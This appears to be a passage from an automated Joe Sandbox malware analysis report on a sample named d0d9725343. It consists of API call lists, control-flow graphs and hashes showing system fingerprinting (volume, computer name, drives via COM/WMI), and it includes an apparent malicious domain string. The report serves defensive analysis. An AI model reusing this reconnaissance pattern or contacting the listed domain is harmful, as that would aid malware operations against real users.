                                                                                                                                                                                                                                              • GetLastError.KERNEL32(?,00248EBF,00000000,00000001,00000000,?,?,00242CBC,?,00000000,00000000,?,?,?,00242602,00000000), ref: 002499F3
                                                                                                                                                                                                                                                • Part of subcall function 00249A44: CloseHandle.KERNEL32(FFFFFFFE,00249A03,?,00248EBF,00000000,00000001,00000000,?,?,00242CBC,?,00000000,00000000,?,?), ref: 00249A54
                                                                                                                                                                                                                                              • ___initconout.LIBCMT ref: 00249A03
                                                                                                                                                                                                                                                • Part of subcall function 00249A25: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,002499C1,00248EAC,?,?,00242CBC,?,00000000,00000000,?), ref: 00249A38
                                                                                                                                                                                                                                              • WriteConsoleW.KERNEL32(00000000,?,00000000,00000000,?,00248EBF,00000000,00000001,00000000,?,?,00242CBC,?,00000000,00000000,?), ref: 00249A18
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 0000000A.00000002.2858660614.0000000000221000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00220000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.2858640081.0000000000220000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.2858689292.000000000024B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.2858711979.0000000000256000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.2858739351.000000000025B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.2858765680.000000000025D000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_10_2_220000_d0d9725343.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 2744216297-0
                                                                                                                                                                                                                                              • Opcode ID: 008b3d7a7ef3e2f49da9e6ce3c851317dd8b570b613e76803d1d0af584396d38
                                                                                                                                                                                                                                              • Instruction ID: 40f9523bff42e77d20b49605d6da0cb7a4e5f5c308bd65659232e8c6b6e1499d
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 008b3d7a7ef3e2f49da9e6ce3c851317dd8b570b613e76803d1d0af584396d38
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 0BF01C36810225BBCF226F91FC0898A3F66FB487F2F104050FE0985260C63289A0EB94
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • GetSystemTimeAsFileTime.KERNEL32(?), ref: 0022E5D9
                                                                                                                                                                                                                                              • GetCurrentThreadId.KERNEL32 ref: 0022E5E8
                                                                                                                                                                                                                                              • GetCurrentProcessId.KERNEL32 ref: 0022E5F1
                                                                                                                                                                                                                                              • QueryPerformanceCounter.KERNEL32(?), ref: 0022E5FE
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 0000000A.00000002.2858660614.0000000000221000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00220000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.2858640081.0000000000220000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.2858689292.000000000024B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.2858711979.0000000000256000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.2858739351.000000000025B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.2858765680.000000000025D000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_10_2_220000_d0d9725343.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 2933794660-0
                                                                                                                                                                                                                                              • Opcode ID: ec0f8bae370f097fde38fad3cb74dbc3d6163c678463f77edeeac9e18d8f8055
                                                                                                                                                                                                                                              • Instruction ID: ee312b392c0bdd85f112b5f8a5257208007f1f92d65a2d5c7fd06e5d3daff368
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: ec0f8bae370f097fde38fad3cb74dbc3d6163c678463f77edeeac9e18d8f8055
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: ACF0B230C1020DEBCB00DBB4E94999EBBF4FF1C205BA19595E412F7510E730AB448B50
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • EncodePointer.KERNEL32(00000000,00000000,00000000,?,?,?,?,?,?,0023A251,?,?,00000000,00000000,00000000,?), ref: 0023A375
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 0000000A.00000002.2858660614.0000000000221000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00220000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.2858640081.0000000000220000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.2858689292.000000000024B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.2858711979.0000000000256000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.2858739351.000000000025B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.2858765680.000000000025D000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_10_2_220000_d0d9725343.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: EncodePointer
                                                                                                                                                                                                                                              • String ID: MOC$RCC
                                                                                                                                                                                                                                              • API String ID: 2118026453-2084237596
                                                                                                                                                                                                                                              • Opcode ID: 0a3009700b88189f75fbd7ef9c7d4ac85e30f749d74b4429c68881ec47d9d87a
                                                                                                                                                                                                                                              • Instruction ID: 13d9088983654332702fab67442e9646e2b234b93adcee036108cf3e4b9788b4
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 0a3009700b88189f75fbd7ef9c7d4ac85e30f749d74b4429c68881ec47d9d87a
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 09418DB191020AEFCF15DF98CC85AEEBBB6BF08300F1481A8FA4566221D3759960DF51
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • ___except_validate_context_record.LIBVCRUNTIME ref: 00239E33
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 0000000A.00000002.2858660614.0000000000221000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00220000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.2858640081.0000000000220000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.2858689292.000000000024B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.2858711979.0000000000256000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.2858739351.000000000025B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.2858765680.000000000025D000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_10_2_220000_d0d9725343.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: ___except_validate_context_record
                                                                                                                                                                                                                                              • String ID: csm$csm
                                                                                                                                                                                                                                              • API String ID: 3493665558-3733052814
                                                                                                                                                                                                                                              • Opcode ID: 4c58dd959ce0ac6030ea90622d90943108f4b535aaae389fe957306d11b644de
                                                                                                                                                                                                                                              • Instruction ID: f6889d251fbea1dc4b07d9e76cd03c2ff86d710aecd0bc3a9887e8de06332b45
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 4c58dd959ce0ac6030ea90622d90943108f4b535aaae389fe957306d11b644de
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: F13194B64302169BCF269F54C8449AA7BA9FF0A315F14815AF99489121C3B3DCF1DF91
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 0000000A.00000002.2858660614.0000000000221000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00220000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.2858640081.0000000000220000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.2858689292.000000000024B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.2858711979.0000000000256000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.2858739351.000000000025B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.2858765680.000000000025D000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_10_2_220000_d0d9725343.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: GetctypeLockitLockit::_std::_
                                                                                                                                                                                                                                              • String ID: ios_base::badbit set
                                                                                                                                                                                                                                              • API String ID: 2423992667-3882152299
                                                                                                                                                                                                                                              • Opcode ID: 7a72ec5557a69cdb97bb58a082309932c59797bfe6bcc8348daf098f338bd6a6
                                                                                                                                                                                                                                              • Instruction ID: 1e96ca049d61e6395f136ad5264178447fcaef67c0f3bb80dee1003eaf84ac53
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 7a72ec5557a69cdb97bb58a082309932c59797bfe6bcc8348daf098f338bd6a6
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 0531F2B0918384ABE310DF64D85531BBBE4AFE4308F04491CF5884B242E7B6E5A8CBD3

                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                                              control_flow_graph 0 431bb0-431c9c GetSystemMetrics * 2 6 431ca3-432087 0->6
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 0000000B.00000002.3093057838.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_11_2_400000_d0d9725343.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: MetricsSystem
                                                                                                                                                                                                                                              • String ID: $&)C$;(C$="C$="C$="C$="C$="C$="C$="C$="C$="C$="C$="C$="C$="C$="C$="C$="C$="C$="C$='C$S%C$b(C$#C
                                                                                                                                                                                                                                              • API String ID: 4116985748-628680385
                                                                                                                                                                                                                                              • Opcode ID: c4360614f8f82c5e27f19abdd04c6f864ef0af49341f313285d7bdd33a848109
                                                                                                                                                                                                                                              • Instruction ID: ea45c71986b2e534ecec44a4126f62931ddcc8577b73b097e58ed3aa899a90b6
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: c4360614f8f82c5e27f19abdd04c6f864ef0af49341f313285d7bdd33a848109
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 41B16FB04097818FE771DF14D48879BBBE0BBC5308F508A2EE5E89B251CBB95448CF86

                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                                              control_flow_graph 9 436f90-436fb8 10 436fc0-437006 9->10 10->10 11 437008-43701f 10->11 12 437020-43705b 11->12 12->12 13 43705d-43709a 12->13 14 4370a0-4370b2 13->14 14->14 15 4370b4-4370cd 14->15 17 4370d7-4370e2 15->17 18 4370cf 15->18 19 4370f0-437122 17->19 18->17 19->19 20 437124-43717b CoCreateInstance 19->20 21 437181-4371b2 20->21 22 437526-437556 call 43ce00 GetVolumeInformationW 20->22 23 4371c0-4371d4 21->23 27 437560-437562 22->27 28 437558-43755c 22->28 23->23 25 4371d6-437200 SysAllocString 23->25 33 437516-437522 SysFreeString 25->33 34 437206-437220 CoSetProxyBlanket 25->34 29 437587-43758e 27->29 28->27 31 437590-437597 29->31 32 4375a7-4375bf 29->32 31->32 35 437599-4375a5 31->35 36 4375c0-4375d4 32->36 33->22 37 437226-43723a 34->37 38 43750c-437512 34->38 35->32 36->36 39 4375d6-43760f 36->39 40 437240-437261 37->40 38->33 41 437610-437650 39->41 40->40 42 437263-4372e3 SysAllocString 40->42 41->41 43 437652-43767f call 41dc20 41->43 44 4372f0-437313 42->44 48 437680-437688 43->48 44->44 46 437315-43733e SysAllocString 44->46 50 437344-437366 46->50 51 4374fa-43750a SysFreeString * 2 46->51 48->48 52 43768a-43768c 48->52 58 4374f0-4374f6 50->58 59 43736c-43736f 50->59 51->38 53 437692-4376a2 call 408070 52->53 54 437570-437581 52->54 53->54 54->29 55 4376a7-4376ae 54->55 58->51 59->58 61 437375-43737a 59->61 61->58 62 437380-4373c8 VariantInit 61->62 63 4373d0-4373e4 62->63 63->63 64 4373e6-4373f4 63->64 65 4373f8-4373fa 64->65 66 437400-437406 65->66 67 4374df-4374ec VariantClear 65->67 66->67 68 43740c-43741a 66->68 67->58 69 437467 68->69 70 43741c-437421 68->70 71 437469-4374a2 call 407ff0 call 408e90 69->71 72 437446-43744a 70->72 83 4374a4 71->83 84 4374a9-4374b1 71->84 73 437430-437438 72->73 74 43744c-437455 72->74 79 43743b-437444 73->79 76 437457-43745a 74->76 77 43745c-437460 74->77 76->79 77->79 80 437462-437465 77->80 79->71 79->72 80->79 83->84 85 4374b3 84->85 86 4374b8-4374db call 408020 call 408000 84->86 85->86 86->67
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • CoCreateInstance.OLE32(0044068C,00000000,00000001,0044067C), ref: 00437173
                                                                                                                                                                                                                                              • SysAllocString.OLEAUT32(D080DE8F), ref: 004371DB
                                                                                                                                                                                                                                              • CoSetProxyBlanket.COMBASE(?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 00437218
                                                                                                                                                                                                                                              • SysAllocString.OLEAUT32(9F4F9D4B), ref: 00437268
                                                                                                                                                                                                                                              • SysAllocString.OLEAUT32(E8D216C6), ref: 0043731A
                                                                                                                                                                                                                                              • VariantInit.OLEAUT32(.'()), ref: 00437385
                                                                                                                                                                                                                                              • VariantClear.OLEAUT32(.'()), ref: 004374E0
                                                                                                                                                                                                                                              • SysFreeString.OLEAUT32(?), ref: 00437504
                                                                                                                                                                                                                                              • SysFreeString.OLEAUT32(?), ref: 0043750A
                                                                                                                                                                                                                                              • SysFreeString.OLEAUT32(00000000), ref: 00437517
                                                                                                                                                                                                                                              • GetVolumeInformationW.KERNELBASE(?,00000000,00000000,?,00000000,00000000,00000000,00000000), ref: 00437552
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 0000000B.00000002.3093057838.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_11_2_400000_d0d9725343.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: String$AllocFree$Variant$BlanketClearCreateInformationInitInstanceProxyVolume
                                                                                                                                                                                                                                              • String ID: !"$"#$%$.'()$.;$>C$C$p*v,${.] ${|
                                                                                                                                                                                                                                              • API String ID: 2573436264-264043890
                                                                                                                                                                                                                                              • Opcode ID: 7a78478979428ae9a6e1ff4e339a7a4033eb69ce9e06f36cd810f297e7b98f92
                                                                                                                                                                                                                                              • Instruction ID: 06fb3ad9466451430b31427f45de08a7eb0daa23bec53a4f5f9458ad790f981b
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 7a78478979428ae9a6e1ff4e339a7a4033eb69ce9e06f36cd810f297e7b98f92
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: D302F0B1A083009FD320CF64CC81B5BBBE5EB99314F14982DF6C59B3A1D679E805CB96

                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                                              control_flow_graph 214 40e2a9-40e2d1 call 4097b0 CoUninitialize 217 40e2e0-40e2f4 214->217 217->217 218 40e2f6-40e307 217->218 219 40e310-40e331 218->219 219->219 220 40e333-40e38e 219->220 221 40e390-40e3aa 220->221 221->221 222 40e3ac-40e3bd 221->222 223 40e3db-40e3e3 222->223 224 40e3bf-40e3cf 222->224 225 40e3e5-40e3e6 223->225 226 40e3fb-40e405 223->226 227 40e3d0-40e3d9 224->227 228 40e3f0-40e3f9 225->228 229 40e407-40e40b 226->229 230 40e41b-40e423 226->230 227->223 227->227 228->226 228->228 231 40e410-40e419 229->231 232 40e425-40e426 230->232 233 40e43b-40e445 230->233 231->230 231->231 234 40e430-40e439 232->234 235 40e447-40e44b 233->235 236 40e45b-40e467 233->236 234->233 234->234 237 40e450-40e459 235->237 238 40e481-40e5b7 236->238 239 40e469-40e46b 236->239 237->236 237->237 240 40e5c0-40e5d8 238->240 241 40e470-40e47d 239->241 240->240 242 40e5da-40e5fb 240->242 241->241 243 40e47f 241->243 244 40e600-40e628 242->244 243->238 244->244 245 40e62a-40e68f call 40b6a0 call 4097b0 CoUninitialize 244->245 250 40e690-40e6a4 245->250 250->250 251 40e6a6-40e6b8 250->251 252 40e6c0-40e6e1 251->252 252->252 253 40e6e3-40e73e 252->253 254 40e740-40e75a 253->254 254->254 255 40e75c-40e76d 254->255 256 40e77b-40e783 255->256 257 40e76f 255->257 259 40e785-40e786 256->259 260 40e79b-40e7a5 256->260 258 40e770-40e779 257->258 258->256 258->258 261 40e790-40e799 259->261 262 40e7a7-40e7ab 260->262 263 40e7bb-40e7c3 260->263 261->260 261->261 264 40e7b0-40e7b9 262->264 265 40e7c5-40e7c6 263->265 266 40e7db-40e7e5 263->266 264->263 264->264 267 40e7d0-40e7d9 265->267 268 40e7e7-40e7eb 266->268 269 40e7fb-40e807 266->269 267->266 267->267 270 40e7f0-40e7f9 268->270 271 40e821-40e948 269->271 272 40e809-40e80b 269->272 270->269 270->270 273 40e950-40e96a 271->273 274 40e810-40e81d 272->274 273->273 276 40e96c-40e98f 273->276 274->274 275 40e81f 274->275 275->271 277 40e990-40e9b9 276->277 277->277 278 40e9bb-40e9e2 call 40b6a0 277->278 280 40e9e7-40e9fd 278->280
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 0000000B.00000002.3093057838.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_11_2_400000_d0d9725343.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: Uninitialize
                                                                                                                                                                                                                                              • String ID: "# `$,$I~$`~$drive-connect.cyou$qx$s
                                                                                                                                                                                                                                              • API String ID: 3861434553-1359720996
                                                                                                                                                                                                                                              • Opcode ID: 1bc8a25b561593e53d2d6339a02d65ee242e64d661e98e766194f6cca9f4be8c
                                                                                                                                                                                                                                              • Instruction ID: 550626b1aa1881637dc35d229a9c1637f44e71d1f63aa888f187a22684203b49
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 1bc8a25b561593e53d2d6339a02d65ee242e64d661e98e766194f6cca9f4be8c
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 2902B0B010C3D18BD3358F2684A07EBBFE1EF92304F189DADD4DA6B252D679040A8B57

                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                                              control_flow_graph 281 4233a0-4233ef 282 4233f0-423402 281->282 282->282 283 423404-423445 282->283 285 423450-42347c 283->285 285->285 286 42347e-423488 285->286 287 423610-42361d 286->287 288 423600-423607 286->288 289 4234c6 286->289 290 4234d7-4234e3 286->290 291 4234e4-4234f5 286->291 292 4237d5-42387f 286->292 293 4237ba 286->293 294 4237a8-4237b2 286->294 295 4234ce-4234d4 call 408000 286->295 296 42348f-423495 286->296 299 423626 287->299 300 42361f-423624 287->300 288->287 289->295 297 4234f7-4234fc 291->297 298 4234fe 291->298 303 423880-42389c 292->303 294->293 295->290 301 423497-42349c 296->301 302 42349e 296->302 305 423500-423537 call 407ff0 297->305 298->305 306 42362d-4236d9 call 407ff0 299->306 300->306 307 4234a1-4234bf call 407ff0 301->307 302->307 303->303 308 42389e-4238ae call 4215f0 303->308 318 423540-423585 305->318 319 4236e0-423724 306->319 307->287 307->288 307->289 307->290 307->291 307->292 307->293 307->294 307->295 314 4238b3-4238b6 308->314 320 4238be-4238db 314->320 318->318 321 423587-42358f 318->321 319->319 322 423726-42372e 319->322 324 4238e0-423904 320->324 325 4235b1-4235bd 321->325 326 423591-423596 321->326 327 423730-423737 322->327 328 423751-423761 322->328 324->324 329 423906-423989 324->329 331 4235e1-4235ec call 43d6c0 325->331 332 4235bf-4235c3 325->332 330 4235a0-4235af 326->330 333 423740-42374f 327->333 334 423763-423767 328->334 335 423781-4237a1 GetLogicalDrives call 43d6c0 328->335 337 423990-4239be 329->337 330->325 330->330 341 4235f1-4235f9 331->341 338 4235d0-4235df 332->338 333->328 333->333 340 423770-42377f 334->340 335->290 335->293 335->294 335->295 335->320 344 4237c0-4237c6 call 408000 335->344 345 4239f1-4239f7 call 408000 335->345 346 4239eb 335->346 347 4237cf 335->347 337->337 343 4239c0-4239e3 call 421270 337->343 338->331 338->338 340->335 340->340 341->287 341->288 341->292 341->293 341->294 341->320 341->344 343->346 344->347 346->345 347->292
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 0000000B.00000002.3093057838.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_11_2_400000_d0d9725343.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID: #R,T$$^<P$VW$]~"p$ij$KM
                                                                                                                                                                                                                                              • API String ID: 0-788320361
                                                                                                                                                                                                                                              • Opcode ID: 83f2170b8c59a65a8a9960c15d95f04e83c213860b07ad3303ead03e3c572ec6
                                                                                                                                                                                                                                              • Instruction ID: 9ed236048ece28067beed024fb633757567cd4a7e3bca11c75bb2a7735f0e68b
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 83f2170b8c59a65a8a9960c15d95f04e83c213860b07ad3303ead03e3c572ec6
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: D1F1CAB46083509FD310DF65E88262BBBF1EFD5304F44892DE4958B351EB789A06CB4B

                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                                              control_flow_graph 354 42bfda-42c03f call 43ce00 358 42c040-42c06c 354->358 358->358 359 42c06e-42c078 358->359 360 42c07a-42c083 359->360 361 42c09d 359->361 362 42c090-42c099 360->362 363 42c09f-42c0ac 361->363 362->362 364 42c09b 362->364 365 42c0cb-42c13a call 43ce00 GetComputerNameExA 363->365 366 42c0ae-42c0b5 363->366 364->363 371 42c140-42c167 365->371 367 42c0c0-42c0c9 366->367 367->365 367->367 371->371 372 42c169-42c173 371->372 373 42c175-42c17f 372->373 374 42c18d 372->374 375 42c180-42c189 373->375 376 42c18f-42c19c 374->376 375->375 377 42c18b 375->377 378 42c1bb-42c20f GetComputerNameExA 376->378 379 42c19e-42c1a5 376->379 377->376 380 42c210-42c252 378->380 381 42c1b0-42c1b9 379->381 380->380 382 42c254-42c25e 380->382 381->378 381->381 383 42c260-42c267 382->383 384 42c27b-42c288 382->384 385 42c270-42c279 383->385 386 42c28a-42c291 384->386 387 42c2ab-42c2ff 384->387 385->384 385->385 388 42c2a0-42c2a9 386->388 390 42c300-42c324 387->390 388->387 388->388 390->390 391 42c326-42c330 390->391 392 42c332-42c339 391->392 393 42c34b-42c358 391->393 396 42c340-42c349 392->396 394 42c35a-42c361 393->394 395 42c37b-42c3d6 call 43ce00 393->395 397 42c370-42c379 394->397 401 42c3e0-42c3fa 395->401 396->393 396->396 397->395 397->397 401->401 402 42c3fc-42c406 401->402 403 42c41b-42c42f 402->403 404 42c408-42c40f 402->404 406 42c572-42c5b1 403->406 407 42c435-42c43c 403->407 405 42c410-42c419 404->405 405->403 405->405 409 42c5c0-42c5e7 406->409 408 42c440-42c44a 407->408 411 42c460-42c466 408->411 412 42c44c-42c451 408->412 409->409 410 42c5e9-42c5fb 409->410 415 42c61b-42c61e call 430520 410->415 416 42c5fd-42c604 410->416 413 42c490-42c49e 411->413 414 42c468-42c46b 411->414 417 42c510-42c516 412->417 420 42c4a4-42c4a7 413->420 421 42c52a-42c533 413->421 414->413 418 42c46d-42c483 414->418 425 42c623-42c643 415->425 419 42c610-42c619 416->419 423 42c518-42c51e 417->423 418->417 419->415 419->419 420->421 424 42c4ad-42c50e 420->424 427 42c535-42c537 421->427 428 42c539-42c53c 421->428 423->406 426 42c520-42c522 423->426 424->417 426->408 429 42c528 426->429 427->423 430 42c56e-42c570 428->430 431 42c53e-42c56c 428->431 429->406 430->417 431->417
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • FreeLibrary.KERNEL32(?), ref: 0042C0D7
                                                                                                                                                                                                                                              • GetComputerNameExA.KERNELBASE(00000006,00000000,00000200), ref: 0042C113
                                                                                                                                                                                                                                              • GetComputerNameExA.KERNELBASE(00000005,?,00000200), ref: 0042C1D8
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 0000000B.00000002.3093057838.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_11_2_400000_d0d9725343.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: ComputerName$FreeLibrary
                                                                                                                                                                                                                                              • String ID: x$#v
                                                                                                                                                                                                                                              • API String ID: 2243422189-2980105896
                                                                                                                                                                                                                                              • Opcode ID: 212c4427347d00bc0ab6c4fd254bb844e7ef8bf1701165750c227f18fd5959f2
                                                                                                                                                                                                                                              • Instruction ID: f24e0535182122329204161442b6cb3576d9d8656e0dc52521a12abdc108ad65
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 212c4427347d00bc0ab6c4fd254bb844e7ef8bf1701165750c227f18fd5959f2
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: EFD1B46060C3E08ED7358B2994903BFBBD1AFD7344F5849ADD0C99B282D779450ACB57

                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                                              • Not Executed
